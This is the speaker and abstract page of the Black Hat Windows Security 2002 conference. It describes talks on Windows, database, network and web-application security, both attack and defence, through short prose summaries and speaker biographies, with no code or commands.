Black Hat Digital Self Defense
Chip Andrews

Ofir Arkin

Jay Beale

Erik Pace Birkholz

Harlan Carvey

Stephen Dugan

Todd Feineman

Halvar Flake


JD Glaser

David Goldman

Jennifer S. Granick

Jeremiah Grossman

Sherief Hammad

Tony Harris

Jim Harrison

Andrew Hintz

Jesper M. Johansson

David Litchfield

Haroon Meer

Timothy Mullen

Joe Nocera

Laura A. Robinson

Tony Sager

Eric Schultze

Thomas Shinder

Murugiah Souppaya

Roelof Temmingh

Jonathan Wilkins


Current Organization and Media Sponsors for Black Hat Windows Security 2002
main speakers schedule sponsors training hotel register

detailske me to..
Topic descriptions are listed alphabetically by speaker.
Presentations are now online and can be found beneath the speaker name on this page.
If you missed any of the talks or was not able to attend, audio and video is available from The Sound of Knowledge.

MS SQL Server Security Mysteries Explained
Chip Andrews,
[ Database Track ]

This presentation will focus on answering the most common questions asked by those seeking to secure applications based on Microsoft SQL Server. Whether you are a programmer, administrator, or a security professional, it is vital to understand the complete picture when deploying a SQL Server application.

Questions will include:

  • Is there any way to strengthen the native SQL Server security model?
    What does a secure SQL Server deployment look like?
    Which security model should I use and why?
    How do I encrypt data in SQL Server?
    Are privilege escalation attacks possible in SQL Server?
    How do I implement SSL with SQL Server over TCP/IP?
    How do I design secure SQL Server-based applications?
    How do I secure managed .NET applications that inter-operate with SQL Server?
    What is "Yukon" and what might it mean for the future of SQL Server?

These topics and others will be explored as we focus on SQL Server as a secure
repository for your data.

Chip Andrews has been a software developer and an independent computer security consultant for more than 16 years and specializes in applying the skills obtained through security consulting to every aspect of
product development. Chip maintains the web site that focuses on SQL Server security issues. Chip has also contributed the SQL Server chapter to the recently released book "Hacking Exposed: Windows 2000" (Scambray, McClure) by Osborne Press. He currently works as a Software Security Architect for Clarus Corporation

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

VoIP: The Next Generation of Phreaking
Ofir Arkin, Managing Security Architect , @stake
[ Network Track ]

"...It is no longer necessary to have a separate network for voice..."

Welcome to the next generation of security hazards and problems inherited from the usage of one network for both Data and Voice. Welcome to the world of IP Based Telephony (and Internet Telephony) which, not only, provide exciting new technologies, but a new challenge for the security community in securing these networks.

Along with new technologies come their security problems. Some security problems inherited from the usage of IP based networks, some (new) result from design flaws and complexity of protocols and implementation, and some result from the combination of both worlds - Telephony and IP.

This talk will also examine several scenarios for deployment of VoIP from several architectural angels - the Internet, a corporate, an ITSP, and a Telecom company. With each and every scenario the security problems will be highlighted and security design tips will be given.

Ofir Arkin, Managing Security Architect, @stake
With extensive knowledge in the information security field, Ofir Arkin has worked as a consultant for several European finance institutes where he played the rule of Senior Security Analyst, and Chief Security Architect in major projects. His experience includes working for a leading European Swiss bank architecting the security of the bank's E-banking project.

Prior to joining @stake Ofir acted as chief security architect for a 4th generation telecom company, were he designed the overall security scheme for the company.

Ofir has published several papers as well as articles and advisories. Most known is the "ICMP Usage in Scanning" research paper. Some of his research was mentioned in professional computer security magazines. He is an active member with the Honeynet project and participated in writing the Honeynet's team book, "Know Your Enemy" published by Addison-Wesley.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Attacking and Defending DNS
Jay Beale, Founder & Principal Security Consultant, JJB Security Consulting and Training
Andrew Hintz, IBM

[ MS Apps Track ]

This talk follows the Attack and Defense format, illustrating the traditional attacks against DNS servers first and then showing how to harden your server or defense. The methods range from refusing queries from the "wrong" hosts to setting up split horizon DNS and firewalling. We'll consider platform-specific defenses on both Windows and Solaris.

Jay Beale is the founder and principal security consultant for JJB Security Consulting and Training. He is the Lead Developer of the Bastille Linux Project, which creates a hardening program for Linux and HP-UX. Jay is the author of a number of articles on computer security, along with the upcoming book "Locking Down Linux the Bastille Way" to be published in the second quarter of this year by Addison Wesley. You can learn more about his articles, talks, courses and consulting via

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

How to Fix A Broken Window
Erik Pace Birkholz, CISSP, Principal Consultant, Foundstone
[ Tools of the Trade Track ]

Part one: Intranet Penetration Testing: Discovering network negligence
Part two: Strengthening Microsoft: When #1 is not an option

Year 2001 was the year that got away. Our comfort zone crumbled. Seemingly well laid plans turned to dust. Systems crashed and networks halted as faceless network attacks tore through cyberspace. As a nation and an industry, we fell victim to devastating attacks that could have been avoided. Security and comfort slipped through our fingers and was gone.

Ladies and gentleman, security has reached the board room. Management wants answers. They want solutions. Above all else they want piece of mind this won’t happen again. Purse-strings are opening; now is the time for IT to make things right. Management finally understands a simple fact that can no longer be avoided: responsibility without authority is a recipe for failure.

C:\>net send * “Don’t expect secure networks if you haven’t empowered your internal security team.”

Security vs. usability may finally become a balanced equation. All the usability in the world isn’t worth a damn if your internal network is a wasteland of default configurations and blank passwords. Security teams are now a required internal resource. Contrary to popular belief there are NOT 24 working hours in a day. Security can not be treated as a side order. The excuses need to stop - now.

Intranet Penetration Testing: Discovering network negligence
I will present a methodology with specific steps and public tools that will aid you in performing internal penetration tests. I will offer opinions on what should, and should not be tested by internal security teams. I will walk through examples and provide demonstrations showing time effective techniques to get the highest return on investment.

Then we will shift gears and begin the first ever interactive “choose your own adventure”. There will be a full network and the flow will be controlled by “you”, the class. As a team, we “choose our own adventure” and see where it leads us. The goal will be complete compromise of two domains and a database full of “fake” credit card information. I will be your guide, but your success is up to you as a class.

Strengthening Microsoft: When # is not an option
A no BS approach on making the best with what we’ve got. No more excuses, the tools and techniques are out there. We will discuss:

  • strong domain architectures
  • rigid user management
  • hardened applications
  • principle of least privilege
  • security baselines for systems
  • defense in depth
  • network segmentation
  • 3rd party audit

Erik Birkholz ( is a Principal Consultant for Foundstone. Erik's prime area of concentration is assessing Internet and Intranet security architectures and their components. Erik has performed nearly a hundred of attack & penetration tests since he began his career in 1995. Erik also instructs Foundstone's "Ultimate Hacking: Hands On" and "Ultimate NT/2000 Security: Hands On" courses.

Prior to joining Foundstone, Inc., he served as Assessment Lead for Internet Security System's (ISS) West Coast Consulting Group. Before ISS, Erik worked for Ernst & Young's eSecurity Services. He was a member of their National Attack and Penetration team, and an instructor for their "Extreme Hacking" course. Erik also spent two years as a Research Analyst for the National Computer Security Association (NCSA).

Mr. Birkholz is a contributing author for the exciting new Hacking Exposed titles: Hacking Exposed: Windows 2000 & Hacking Exposed, Third Edition. Previously, Erik was featured in the international best seller, Hacking Exposed, Second Edition and has been published in The Journal of the National Computer Security Association and Foundstone's Digital Battlefield. He has also presented his research at The Black Hat Briefings and The Internet Security Conference (TISC).

Erik holds a BS in Computer Science from Dickinson College, Pennsylvania, where he was a 1999-2000 Metzger Conway Fellow, an annual award presented to a distinguished alumnus that has achieved excellence in their field of study. He is a Certified Information Systems Security Professional (CISSP) and a Microsoft Certified Systems Engineer (MCSE).

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

NT/2K Incident Response and Mining for Hidden Data:
Post Mortem of a Windows Box
Harlan Carvey
[ Deep Knowledge Track ]

Part 1: NT/2K Incident Response
Current reactions to security incidents against NT/2K systems seem to range from Homer Simpson ("If I didn't see it, it didn't happen") or rebooting the system, to paying thousands of dollars for a forensics analyst...with very little in between. A lot of extremely useful volatile information lives on a 'victim' machine, but is often overlooked because it is accessible from the "Dark Place", i.e., the command line. This volatile information can give the administrator an excellent view of the situation, and may prove useful in an investigation. This presentation will discuss a methodology and framework for incident response on NT/2K systems. Policies and procedures will be touched on, and various available tools and techniques will be demonstrated. Demonstrations will show what type of information can be collected, how to get it off of the 'victim' system cleanly, and what that information means to the administrator or investigator.

Part II: Hiding Data on NT/2K
GUI's like Windows are used to increase the efficiency of the user, but they also provide a curtain for a malicious user to hide behind. This presentation will demonstrate several techniques for hiding data on NT/2K systems, some of which are as old as DOS...but still work. Other techniques, such as steganography, will also be discussed. NTFS alternate data streams will be covered in detail, to include differences between NTFS4 (NT) and 5 (2K). Various tools to detect the presence of hidden data will be demonstrated, and techniques to prevent and detect the activity will be discussed.

Harlan Carvey is an information security consultant with a deep and ongoing curiosity into getting under the hood of NT/2K platforms. Conducting vulnerability assessments and penetration tests of NT led to a growth in his use of Perl, in order to prototype both offensive and defensive security tools. Performing incident response and forensics investigations at a large telecomm presented him with many interesting challenges and learning experiences. Harlan has had articles published on, as well as in the Information Security Bulletin. He holds a BSEE from the Virginia Military Institute, and an MSEE from the Naval Postgraduate School.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Protecting Your Cisco Infrastructure Against the Latest "Attacktecs"
Stephen Dugan, CCSI
[ Network Track ]

This Presentation will focus on Cisco Routers and Switches and the commands used to protect them. The presentation will also include a live demo of the commands in a Cisco Network. The Presentation and Demo will include:

  • Securing Device Access and Management Protocols
    Stopping Console Password Recovery
    Protecting L3 Routing Protocols
    Eliminating ARP Spoofing Attacks
    VLAN Implementation Issues

Stephen Dugan is currently an independent contract instructor and network engineer.b He has been teaching Cisco networking for the last 3 years focusing on Router and Switch configuration, Voice/Data integration, and Network Security. His students come mostly from Fortune 500 companies and large service providers. He also teaches private internal classes to Cisco Employees. As a Sr. Network Engineer he has worked on the design and implementation of large enterprise, government contractor, and service provider networks. He is also working on a new series of security books entitled "Hacker Attacktecs." The first three planned books will cover Windows, Unix/Linux, and Cisco exploits and how to defend against them.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Third Generation Exploits on NT/Win2k Platforms
Halvar Flake, Reverse Engineer, Black Hat Consulting
[ Deep Knowledge Track ]

Due to the fact that standard stack-smashing overflows are getting a bit rare in well-audited code new ways of executing arbitrary code on attacked machines are badly needed. With the appearance of format string bugs and malloc() / free()-manipulations the attacking side has two powerful techniques of writing more or less arbitrary data to more or less arbitrary locations.

Assuming we classify the different overrun exploitation techniques into generations it could look like this:

  • Generation 1: Standard return address overwrites
    Generation 2: Frame pointer overwrites, off-by-ones etc.
    Generation 3: malloc()/free() overwrites, format bugs etc.

While third generation exploits have been documented on *NIX platforms, documentation concerning their exploitation under NT/Win2k is rare. But this class of vulnerabilities are especially interesting from the reverse engineers perspective on closed-source platforms, as traditional means of vulnerability research (e.g. stress testing with tools like RetinaTM or HailstormTM) fail to detect these problems.

This speech will consist of two halves: The first half will cover format string vulnerabilities, covering all aspects ranging from detection (both in source and binary) to reliable exploitation in multithreaded environments without killing the exploited service. The second half of the speech will focus on malloc()/free() overwrites, explaining their general principle, documenting the different implementations of heap management under NT/Win2k (Borland C++, Visual C++, native operating system support in various versions etc.) and explaining how to exploit them in various situations.

Halvar Flake is Black Hat's new resident reverse engineer. Originating in the fields of copy protection and digital rights management, he gravitated more and more towards network securityover time as he realized that constructive copy protection is more or less fighting windmills. After writing his first few exploits he was hooked and realized that reverse engineering experience is a very handy asset when dealing with COTS software. With extensive experience in reverse engineering, network security, penetration testing and exploit development he recently joined BlackHat as their main reverse engineer.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Routing and Tunneling Protocol Attacks
FX, Phenoelit
[ Network Track ]

The functionality and security of TCP/IP networks depends on the layer 2 and 3 traffic flow information. Attacks against these layers will immediately affect the operation of your network and the security of your servers.

This speech will provide you with the possible attack scenarios, layer 2 attacks (alias "interception"), router discovery and how an attacker can influence the flow of information in your network using a variety of routing
protocols. Another key point is the impact of these attacks in your every day's business and why you should include communication layers into your security considerations.

The finale will explain attacks against several tunneling mechanisms used for large corporate networks and how things like GRE, IPIP and others can enable intruders to attack your supposedly protected systems in RFC1918 networks. Also, the issues surrounding IPv6 islands will be discussed.

FX of Phenoelit is the leader of the German Phenoelit group. His and the group's primary interests are in security implementations and implications of standards or less-known protocols. FX works as a Security Solution Consultant at n.runs GmbH

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

One-Way SQL Hacking: Futility of Firewalls in Web Hacking
JD Glaser, Director of Engineering, Foundstone
[ Database Track ]

Topics covered will be:

  • Overview of Web attacks 
  • One-way attacks 
  • SQL Entry points 
  • Privilege escalation 
  • Installing a web based sql command prompt 
  • Back-end Database Enumeration tool  
One Way SQL Web Hacking: SQL Web hacking is the next generation of hacking "kung fu." This talk expands on our previous web talks with new SQL techniques for taking apart an e-commerce site. Join us for an eye-opening demonstration on what can go wrong with poorly secured Web applications, how severe the risks are, and how to protect yourself and your company. 

We shall be covering vulnerabilities ranging from web server misconfigurations, improper URL parsing, application level vulnerabilities, Java application server hacking and some special advanced techniques. 

JD Glaser provides customized NT network security and audit tools for Foundstone. He specializes in Windows NT system software development and COM/DCOM application development. His most recent achievement was the successful formation of NT OBJECTives, Inc., a software company exclusively centered on building NT security tools. Since it's inception, over 100,000 of those security tools have been downloaded and put into practice. In addition, he has written several critical, unique intrusion audit papers on NT intrusion forensic issues. Currently, JD has been retained as a featured speaker/trainer for all the BlackHat Conferences on NT security issues.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

The Deep Technical Audit: How to Mitigate the Risks Presented in Other Sessions
David Goldman, PriceWaterhouseCoopers
Todd Feinman, PriceWaterhouseCoopers
Joe Nocera, PriceWaterhouseCoopers

[ General Track ]

As Windows 2000, XP, and .Net Server are increasingly the platforms of choice for corporate and e-commerce initiatives, they are also increasingly the target of choice for hackers. And, as evidenced by this conference, television media, and Internet forums, there are a great number of security issues surrounding the Windows family of operating systems. However, through careful attention to system configuration, as well as a comprehensive and continuous program for auditing and monitoring system security, a high degree of reliance can be placed on Windows servers.

In this session, we will discuss the critical components of a deep technical assessment necessary to defend against today's known and tomorrow's unknown threats. These components will cover all areas of Windows security and provide a flexible framework to adapt that will allow you to develop a program customized for your environment. 

David Goldman is currently in PricewaterhouseCoopers Global Risk Management Services - Security consulting practice and is focusing on assisting businesses secure their online environments. Leveraging his background in e-business systems and Internet enabled application design, he facilitate the incorporation of sound security practices into corporate operations. Currently, he is managing the assessment, design, and implementations of security and controls on systems and applications across disparate environments. His specialty is Windows NT/2000 and has written several white papers and articles on the subject.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Digital Rights Management Legal Briefing
Jennifer S. Granick, Clinical Director of Stanford Law School Center for Internet and Society
[ Keynote ]

Jennifer Stisa Granick is a Lecturer in Law and Director of the Litigation Clinic at Stanford Law School's Center for Internet and Society. Ms. Granick's work focuses on the interaction of free speech, privacy, computer security, law and technology. She is on the Board of Directors of the Honeynet Project, a computer security research group, and has spoken at the National Security Agency, to law enforcement officials and to computer security professionals from the public and private sectors in the United States and abroad. Before joining Stanford Law School, Ms. Granick practiced criminal defense of unauthorized access, trade secret theft and email interception cases nationally. She has published articles on wiretap laws, workplace privacy and trademark law.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Web Application Security and Release of "WhiteHat Arsenal"
Jeremiah Grossman, Founder and Chairman of WhiteHat Security, Inc.
[ Tools of the Trade Track ]

Discussion will include the theory surrounding some of the more dangerous web application attacks known, how to test for them quickly and determine possible countermeasures. Insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. It is for these very reasons that WhiteHat Security Inc., is pleased to introduce its new release, "WhiteHat Arsenal", the next generation of professional web security audit software.

WH Arsenal possesses a powerful suite of GUI-Browser based web security tools. These endowments make WH Arsenal capable of completing painstaking web security pen-test work considerably faster and more effectively than any of the currently available tools. Imagine employing WH Arsenal to quickly customize and execute just about any web security attack possible and having those penetration attempts logged in XML format for later reporting or analysis.

Many experienced web security professionals tend to agree that even the best current web security scanners, which scan only for known vulnerabilities, achieve only very limited success or simply do not work at all. Furthermore, these types of tools often result in an enormous overflow of false positives. WhiteHat understands these frustrating shortcomings and is poised to revolutionize the way in which web applications are penetration tested.  

Jeremiah Grossman is the founder and chairman of WhiteHat Security, Inc. and former Yahoo! information security officer.

As information security officer at Yahoo!, Jeremiah designed, audited, and penetration-tested the company's web applications. As one of the world's busiest web properties, all of these applications demanded the highest level of security available.

Continuing his work of the past 5 years, Jeremiah researches and applies his expertise to information security with special emphasis on prevention of web application intrusion. Grossman has presented "Web Application Security" talks at many security conventions including the BlackHat Briefings, the Air Force and Technology Conference, Defcon and ToorCon. He is considered to be among the world's foremost web security experts.

[ Their Presentation! ] [ Download their tool! ] [ See It! ] [ Hear It! ]

Return to the top of the page

NIST Recommendations for System Administrators for Securing Windows 2000 Professional
Tony Harris, Booz Allen
Murugiah Souppaya, NIST
[ MS Apps Track ]

Windows 2000 Professional has many security features System Administrators can enable to protect their users and their network.

This session will present the key ideas found in the NIST System Administration Guidance for Securing Microsoft Windows 2000 Professional System draft document. You will be presented with NIST's recommended practices for installing, configuring, securing Windows 2000 Professional operating systems and popular applications. Various security settings for Windows 2000 Professional, i.e. registries, ACL, services, binaries, and tools will be reviewed. In addition, security configurations for various applications will be presented, such as Symantec Norton AntiVirus, Network Associates McAfee, and F-Secure Anti-Virus virus scanners, Microsoft IE and Netscape Communicator web browsers, Microsoft Outlook and Eudora e-mail clients, and Microsoft Office 2000 Professional productivity software.

Our document is available at:

Murugiah Souppaya works as a network administrator for the Computer Security Division in the Information Technology Laboratory at the National Institute of Standards and Technology.

Anthony Harris provides Security Consulting services to various Government and Corporate clients as the Risk Management Technologies and Training group, Penetration Testing Services lead at Booz Allen Hamilton Anthony has over 12 years of experience securely managing, designing, assessing, and penetration testing networked systems. Anthony has performed research and penetration testing for dozens of clients on hundreds of networks and uses the knowledge gained to develop secure networking and configuration solutions for various Government and Corporate clients.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Mobile Computing Security
Jesper M. Johansson, Senior Technologist, Microsoft's Security Strategies Group
[ General Track ]

Mobile computing is changing the landscape of organizational networks. Many organizations issue notebooks as standard equipment. However, not all mobile computers run operating systems like Linux, MacOS, and Windows. Many, such as Palm Inc.'s Palm series, and the plethora of pocket and hand-held PCs running Microsoft Windows CE, are called personal digital assistants and are themselves mobile computers. As mobile telephones become more powerful, they too will effectively become mobile computers. When attached to a network, many mobile computers are capable of acting as clients for organizational networks. This introduces a new dimension to the problem of information security.

In the past, computer security was concerned with controlling access to data that resided on workstations or was transmitted across networks. An unstated assumption was that physical security could be assured by protecting the endpoints of communication-the systems on which the data resided-and augmenting that protection with software controls such as cryptography and access control mechanisms. But once we put secret and valuable organizational data on a device that is designed to be used outside the confines of the organizational network, we are dealing with new security problems that have not yet received much attention in the literature.

The purpose of this presentation is to explore how of mobility of physical computing devices affects security issues. We classify the security issues involving these mobile client computers and briefly discuss some promising solution strategies to mitigate these issues.

Jesper M. Johansson is a senior technologist in Microsoft's Security Strategies group. His work at Microsoft deals with providing a more secure computing infrastructure and user experience across the range of products and services Microsoft sells. Prior to joining Microsoft, he was an Assistant Professor of Information Systems at Boston University. At Boston University he did research on information security, computer networking, and databases, and taught in those areas as well. Jesper M. Johansson has a Ph.D. in Management Information Systems from the University of Minnesota, a Masters of Science in Information Systems and a Masters of Business Administration from the University of Maryland, and a Bachelor of Arts in International Business/German with a minor in French Literature from the California State University, Fullerton.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Oracle Vulnerabilities
David Litchfield, Managing Director & Co-Founder, Next Generation Security Software
Sherief Hammad
[ Database Track ]

This talk will examine the security of Oracle 9iAS and what needs to be done in order to make it secure exploring configuration issues, component architecture design flaws and software security holes such as buffer overruns. During the presentation David will explore PL/SQL, JSP and SOAP and will demonstrate how the Oracle web front end can be compromised with a buffer overflow vulnerability and then from there compromising the database server exploiting a component communications design flaw to gain complete control without requiring to authenticate.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Web Vulnerability and SQL Injection Countermeasures:
Securing Your Servers From the Most Insidious of Attacks
Timothy Mullen, CIO, AnchorIS.Com
[ Database Track ]

The demands of the Global Marketplace have made web development more complex than ever. With customer demands and competitive influences, the functions our applications must be capable of performing constantly push our development into new areas.

Even with enterprise firewall solutions, hardened servers, and up-to-date web server software in place and properly configured, poor design methodology can leave our systems open for attack. This session will take a look at the vulnerabilities created by deploying weak web forms, the manipulation of URL structures, the injection of SQL code, and other methods. From there, we will take an in-depth look at what steps to take to minimize the impact of these attacks, including:

  • User Input Validation and Sanitation
    Variable declaration and typing
    SQL procedure structure and parameter passing

Graduated examples of "good-better-best" programming practices will be made in detail, giving you the tools and strategies you need to immediately begin deploying more secure web-based applications.

Timothy Mullen is CIO and Chief Software architect for AnchorIS.Com, a developer of secure enterprise-based accounting solutions.  Mullen is also a columnist for Security Focus' Microsoft Focus section, and a regular contributor of InFocus technical articles.  A.k.a. Thor, he is the founder of the "Hammer of God" security coop group.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

The Devil Inside: Planning Security in Active Directory Design
Laura A. Robinson
[ MS Apps Track ]

While you may already know that Active Directory offers you the ability to designate and delegate administration far beyond what NT offered, you may not realize that an improperly designed Active Directory infrastructure leaves you most vulnerable to attacks and mismanagement from the very people to whom you've entrusted your day-to-day administration. Windows 2000 provides a wealth of mechanisms to help protect your network from intentional or accidental damage from inside, but many companies either fail to take advantage of the protections available, or build an incomplete design and end up with a false sense of security.

In this session, you'll be given an overview of Active Directory design, including placement of domain controllers, global catalog servers and DNS servers. We'll discuss namespace decisions and best practices, and we'll look at designing organizational units for delegation of administration and effective application of Group Policy. However, we'll also analyze some of the often-overlooked aspects of AD design. For example, did you know that a Domain Admin from any domain in the forest has the potential to cripple your entire forest? Did you know that it's not really possible to completely "lock out" a user who has Enterprise Admin capabilities? As with any network security, the biggest risk doesn't come from the technology itself, but how it is used. With a few simple best practices, you can significantly reduce the possibility that either a disgruntled or poorly educated employee may compromise the environment, but far too many companies overlook these best practices in pursuing ease of administration. If your network administrators are using built-in administrative accounts to perform much of their administration (even with the use of secondary logon); if they are locally administering domain controllers; if you have not changed several of the default security settings in Active Directory; if you aren't auditing crucial activities in Windows 2000; or if you haven't designed and delegated OUs properly, then your implementation is at risk. You may know about technologies provided in Windows 2000 to help you secure your environment, but you may not know the most effective ways to use them.

This session is not a presentation of exploits of the operating system. It is not intended to discuss the other layers of security you should implement in your network. However, if your focus has been primarily on firewalling your network, implementing intrusion detection and performing forensic analysis, then you've been missing a large piece of your network's security. Windows 2000 provides much more granular and effective security measures than NT did, but if your installations are still "out of the box" in terms of their security configurations and if you think your domain is a true security boundary, then it is time you took a second look.

Laura Robinson is a consultant and trainer who specializes in Active Directory design and has been involved architecting AD implementations ranging from 600 to 60,000 users, for companies supporting millions of customers. She authored several chapters of the Microsoft Press book, "Windows 2000 TCP/IP Protocols and Services Technical Reference", has been working with Windows 2000 since Beta 1 and teaching it since Beta 2, and has continued her involvement in Microsoft's operating system technologies through her work with .Net servers in 2001. Laura is a Microsoft Certified Trainer and Systems Engineer on both NT and Windows 2000; a Certified Lotus Professional Systems Administrator, Application Developer and Instructor; and an instructor for Real World Security's @ctive Defense education series.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Windows Security Configuration Guide
Tony W. Sager, The National Security Agency
[ Keynote ]

One of the most exciting and challenging aspects of network security is that it is shared across all aspects of our society. But this is also a great opportunity to explore the potential for dramatically greater cooperation between government and the private sector. With a shared problem, we have no choice but to pursue shared solutions.

The presentation discusses the development of the National Security Agency's Security Recommendation Guides to Windows 2000, a story still in progress. The specifics of the story are less important than some key themes that it illustrates: gaining agreement across a broad community of technical experts, translating vulnerability information into constructive action, building a support environment to integrate Guides into management of the network, and cooperation within government and with the public.

Tony Sager is the Chief of the System and Network Attack Center (SNAC/C4), part of the Information Assurance Directorate of the National Security Agency (NSA). During his 24 years with NSA, he has served in a variety of technical and management positions, spanning computer security, cryptography, software analysis, and network security. His Center produces the NSA Security Recommendation Guides to Windows 2000, the first of several security products they have released to the public. Tony is also actively involved with a number of community-wide public activities in network security. He has degrees in Mathematics and Computer Science, and dabbles as a PC hobbyist, struggling to protect his home LAN from bad guys and three adventurous adolescent users.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

How to Stay Up-To-Date On Security Patches
Eric Schultze, Senior Technologist , Security Strategies Group, Microsoft
[ General Track ]

New security patches are released every week. How can you informed about each of the patches and their applicable platforms? What is Microsoft doing to make it easier to identify and deploy hotfixes? This session will discuss the various methods to stay aware on what patches are available for your various platforms some of the tools you can use
to help deploy these patches across your enterprise.

We will discuss the current tools that Microsoft makes available to deploy security hotfixes, as well as some cool new ideas to deploy patches using Active Directory and/or batch scripting. We'll also discuss the new concepts and tools coming out of Redmond to help support ongoing security patch management.

A good portion of this discussion will focus on version 2 of the XML-based security hotfix database and the tools available to parse this file. Third party vendors, tool developers, and yes, even Harlan Carvey and his Perl scripts will be able to leverage the new XML schema to build tools to automatically assess, download, and apply patches to Microsoft systems. Stop the madness, apply the patches, be secure.

Eric Schultze is a Senior Technologist in the Security Strategies group at Microsoft and has memorized every security hotfix ever released by Microsoft in a security bulletin. In his spare time, he maintains the Microsoft hotfix XML database and designs new features for HFNetChk. Eric is a former Founder of Foundstone, co-creator of the Extreme\Ultimate Hacking training classes, and technical editor for the Hacking Exposed: Windows 2000 book. A fashion victim of his former employer, Eric will be sporting his Foundstone action-figure attire during the conference.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Deploying and Securing Microsoft Internet Security and Acceleration Server
Thomas Shinder, MD, Moderator,
Jim Harrison, Microsoft Tester , Subscription Products Group, Microsoft
[ MS Apps Track ]

Microsoft's Internet Security and Acceleration Server (ISA Server) is quickly becoming
a popular choice for system administrators looking for Enterprise class firewall solutions.

Not only does ISA provide a competitive firewall product, but it supports advanced filtering capabilities, server publishing, and Internet content caching. It also takes time and discipline to master.

This session will lead you through the proper design and deployment of ISA Server in both Enterprise and Stand-Alone environments, and will discuss the tricks and traps of proper firewall rule design, client configuration, and troubleshooting.

Once deployed, ISA Server must also be properly maintained. We will discussing the various ISA Server log files and Windows event log entries, what they mean, and how to properly interpret and discern the information therein.

Thomas W Shinder, M.D. is a 10-year computing industry veteran who's worked as a trainer, writer and a consultant for Fortune 500 companies including FINA Oil, Lucent Technologies and Sealand Container
Corporation. Tom has written or contributed to over 20 Windows 2000 related books and was a Series Editor of the Syngress/Osborne Series of Windows 2000 Certification Study Guides. He is also the author of the best selling book "Configuring ISA Server 2000: Building Firewalls with Windows 2000".

In addition to his book work, Tom stays busy as the editor of the Win2k Insider newsletter, editor of the Sunbelt Software WinXP News newsletter, and is a regular contributor on networking and network security infrastructure topics to

Tom is one of the primary perpetrators of and he wears the hats of content editor, contributor and moderator for the World's leading site on ISA Server 2000, When not writing, he spends time consulting on ISA Server and security projects with small and medium sized businesses and government entities.

Jim Harrison, a Microsoft tester with the Subscription Products Group, was introduced to ISA server when he joined the NetDocs group as an infrastructure tester. After overviewing the MS ISA server deployment and infrastructure topology, he became encouraged to design the ISA deployment and setup for NetDocs, and is now an avid ISA server supporter and systems implementer.

As a known authority of ISA Server's vast enterprise configuration options, Jim consults for various Microsoft groups on proper deployment and installation of the product. Currently, Jim is engaged in different test projects designing integrated solutions for Microsoft's intra- and extranets.

Jim is also a regular contributor and technical writer for the most popular ISA Server information portal in existence,

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Bi-directional Communications in a Heavily Protected Environment
Roelof Temmingh,Technical Director & Founding Member, SensePost
Haroon Meer, Technical Security Specialist, SensePost
[ General Track ]

The paper concentrates on setting up a reliable bi-directional data stream in a non-conducive environment. A practical application for such a data stream is that of a Trojan. The presentation however does not concentrate on functionality of such a Trojan. The talk focuses on methods to set up bi-directional communication in the presence of stateful firewalls, NAT devices, non-routed networks, content level checking (such as anti-virus devices), authentication proxies and caches, using (amongst other techniques) encapsulation within existing protocols.

The objective of the presentation is to stimulate the minds of the attendees to further explore different applications of the technique and to find ways to counter such activities while not discussing the applications of the techniques in depth. The presentation provides a practical demonstration; keystrokes are transmitted from a heavily protected network to a controller on the Internet, and a file transfer implementation is demonstrated. Source code and binaries for above demonstration will be made available.

Roelof Temmingh is the technical director and a founding member of SensePost. After obtaining his degree in electronic engineering in 1995, he started his career working as a programmer at a cutting edge development company specializing in data encryption devices. Establishing SensePost along with
some of South Africa's leading IT security minds Roelof is currently involved in the coding of proof of concept code, and the practical realization of complex security concepts. He has a captivating interest in Trojans - he published an article on HNN (then L0pht, now part of @stake) in 1998 entitled "Worst Nightmares Come Alive" that featured in Bruce Sneider's CryptoGram, and made headlines on SlashDot (a
year after published). Roelof has been a speaker at the 2001 "Summercon" conference in Amsterdam.

Haroon Meer joined SensePost as a Technical Security Specialist after over 7 years in the Networking / Security industry. He has a wide background in security & networking from writing code to administration of large Campus networks. He is currently heavily involved in the development of additional security tools and proof of concept code.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Jonathan Wilkins, Security Researcher,
[ Network Track ]

Taranis redirects traffic on switch hardware by sending spoofed ethernet traffic. This is not the same as an ARP poisoning attack as it affects only the switch, and doesn't rely on ARP packets. Plus, it is virtually invisible because the packets it sends aren't seen on any other port on the switch. Evading detection by an IDS that may be listening on a monitoring port is as simple as changing the type of packet that is sent by the packet spoofing thread.

I will cover the ethernet layer in depth and then go on to explain how current switch hardware works. I'll then give a demonstration of Taranis and explain how the attack can be extended for arbitrary protocols. I'll finish up with defences and directions for future research.

To download taranis, go to:

Jonathan Wilkins has been active in the security community since the early 1990's. He worked for Secure Networks Inc developing Ballista (now Network Associate's CyberCop Scanner) and at Zero Knowledge on the Freedom privacy suite. He has released several security tools including NTCrack and has been publishing security research since 1996.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

Cracking NTLMv2 Authentication
[ Tools of the Trade Track ]

